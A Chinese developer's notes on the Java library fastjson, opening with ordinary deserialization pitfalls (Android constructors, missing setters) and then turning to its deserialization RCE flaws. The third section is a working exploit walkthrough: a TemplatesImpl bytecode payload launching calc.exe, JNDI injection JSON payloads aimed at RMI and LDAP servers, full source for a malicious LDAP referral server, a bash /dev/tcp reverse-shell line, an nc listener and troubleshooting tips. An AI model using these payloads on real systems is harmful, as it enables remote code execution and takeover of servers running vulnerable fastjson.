适用版本:
fastjson:1.2.71
fastjson:1.1.72.android
一、JavaBeanInfo build 5XX行:"default constructor not found. " + clazz
fastjson反序列化过程参考:https://www.cnblogs.com/Raiden-xin/p/12681577.html
发现于安卓环境,出于保证对象初始化时某属性必须赋值的目的,只提供了有参构造函数;非android运行环境测试正常。
fastjson通用版本的有参构造函数反序列化依赖于ASMUtils获取构造函数传入的形参名称、进而去json串中查找对应名称的字段来赋值;由于java和android虚拟机不同,生成的字节码格式有差异,ASMUtils.lookupParameterNames判断了是否为安卓环境(虚拟机名称),若是直接返回空数组,导致有参构造函数不可用。
fastjson安卓版本必须要求默认构造函数+setter方法反序列化。
注:
1、构造函数是否为public并不影响,调用时会setAccessible。
2、通过有参构造函数反序列化对象时,属性的赋值通过Field完成,与getter/setter方法是否存在无关。
启示:遵循JavaBean规范,提供默认公用无参构造函数,bean和模型分离。
二、没有setter方法则属性值为null:高版本未设置setter方法会找不到FieldDeserializer
JavaBeanInfo build 515行 会先查找setter方法、根据属性名称反射拿到Field,在620行new出FieldInfo、加入fieldList。
720行收集getter方法,判断是否是集合或者map,不会建立FieldInfo对象。
JavaBeanInfo的FieldInfo[]在没有JsonField注解时基本只由setter方法决定,
FieldDeserializer基于JavaBeanInfo建立,
JavaBeanDeserializer:高版本默认构造器生成对象后不走FieldInfo,即不会通过Field、而是通过FieldDeserializer-DefaultFieldDeserializer的setter Method进行属性赋值
启示:遵循JavaBean规范,提供声明属性的公用setter、getter方法,bean和模型分离。
三、fastjson<1.2.70反序列化RCE安全漏洞
背景随便查一下,一大片一大片满是的。。
反序列化黑名单位置:com.alibaba.fastjson.parser.ParserConfig.denyList(值由原来的全路径改为hash值)
<1.2.70版本的利用方式尚未公布,公众号上已有人提供了思路。以下只大致记录下自己验证过的漏洞利用过程,分别测试了运行计算器和反弹shell:
【初版 现被黑名单封堵】
Exploit:
ParserConfig config = ParserConfig.global;
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
ParserConfig.getGlobalInstance().addAccept("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
String evilClassPath="D:\workspace\...\poc.class";
String evilCode = readClass(evilClassPath);
final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
String text1 = "{"@type":"" + NASTY_CLASS +"","_bytecodes":[""+evilCode+""],'_name':'a.b','_tfactory':{ },"_outputProperties":{ }," +
""_name":"a","_version":"1.0","allowedProtocols":"all"}
";
Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField);
import java.io.IOException;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
public class poc extends AbstractTranslet {
public poc() throws IOException {
Runtime.getRuntime().exec("calc.exe");
namesArray=new String[0];
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
}
@Override
public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] haFndlers) throws TransletException {
}
}
【<=1.2.47版本漏洞 构造反序列化对象缓存绕过黑名单验证+JNDI注入】
环境条件:
jmi:需要jdk8 121以下(一说113)
ldap:需要jdk8 182以下(一说191)
#rmi
#创建服务器
Registry registry = LocateRegistry.createRegistry(1099);
System.setProperty("java.rmi.server.hostname","192.168.10.109");
String remote_class_server = "http://192.168.10.109/";
Reference reference = new Reference("Exploit", "xxx.Exploit", remote_class_server);
//reference的factory class参数指向了一个外部Web服务的地址
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
registry.bind("poc", referenceWrapper);
#rmi触发接口入参
{ "name":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "x":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://192.168.10.109/poc", "autoCommit":true } }
#ldap
#Exploit中反弹shell语句
bash -i >& /dev/tcp/xx.xx.xx.xx/xxxx 0>&1
#创建服务器
新建一个testfastjson工程,引入依赖
<dependency>
<groupId>com.unboundid</groupId>
<artifactId>unboundid-ldapsdk</artifactId>
<version>3.1.1</version>
</dependency>
LdapServer:
package testfastjson;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
public class LdapServer {
private static final String LDAP_BASE = "dc=example,dc=com";
public static void main(String[] args) {
int port = xxxx;
try {
InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
config.setListenerConfigs(new InMemoryListenerConfig("listen",
InetAddress.getByName("0.0.0.0"),
port, ServerSocketFactory.getDefault(), SocketFactory.getDefault(),
(SSLSocketFactory) SSLSocketFactory.getDefault()));
config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[0])));
InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
System.out.println("Listening on 0.0.0.0:" + port);
ds.startListening();
} catch (Exception e) {
e.printStackTrace();
}
}
private static class OperationInterceptor extends InMemoryOperationInterceptor {
private URL codebase;
/**
*
*/
public OperationInterceptor(URL cb) {
this.codebase = cb;
}
/**
* {@inheritDoc}
*
* @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
*/
@Override
public void processSearchResult(InMemoryInterceptedSearchResult result) {
String base = result.getRequest().getBaseDN();
Entry e = new Entry(base);
try {
sendResult(result, base, e);
} catch (Exception e1) {
e1.printStackTrace();
}
}
protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e)
throws LDAPException, MalformedURLException {
URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
e.addAttribute("javaClassName", "Exploit");
String cbstring = this.codebase.toString();
int refPos = cbstring.indexOf('#');
if (refPos > 0) {
cbstring = cbstring.substring(0, refPos);
}
e.addAttribute("javaCodeBase", cbstring + "/");
e.addAttribute("objectClass", "javaNamingReference");
e.addAttribute("javaFactory", "Exploit");
result.sendSearchEntry(e);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
}
}
}
#ldap触发接口入参
{ "name":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "x":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://192.168.10.109:xxxx/Exploit", "autoCommit":true } }
攻击方部署
(1)搭建ldap服务器
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.10.109#Exploit 1389
或
java -cp testfastjson-0.0.1-SNAPSHOT-all.jar testfastjson.LdapServer http://192.168.10.109#Exploit
注:marshalsec是一个专门复现、验证漏洞集合的工具,但我在测试中并未成功,只好参考marshalsec的源码搭建了简易的ldap服务器
(2)web服务支持文件下载
提供Exploit下载url
(3)攻击机等待反弹shell
nc -lvvp xxxx
原理是远程通过url加载工厂类,运行其中构造函数/重写的方法。
坑点记录:
1、最关键的是javaCodeBase,后加/
2、Exploit如果有包结构,一定要放到jar里边,相应的在javaCodeBase后边添加jar路径,否则报java.lang.NoClassDefFoundError(wrong name:xxx)
3、注意JDK版本,高版本中com.sun.jndi.cosnaming.object.trustURLCodebase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。
延伸:
【关于JDK高版本下RMI、LDAP+JNDI bypass的一点笔记:直接返回从javaSerializedData属性中获取的属性值】
https://www.cnblogs.com/tr1ple/p/12335098.html
【如何绕过高版本JDK的限制进行JNDI注入:利用本地Class作为Reference Factory】
https://www.freebuf.com/column/207439.html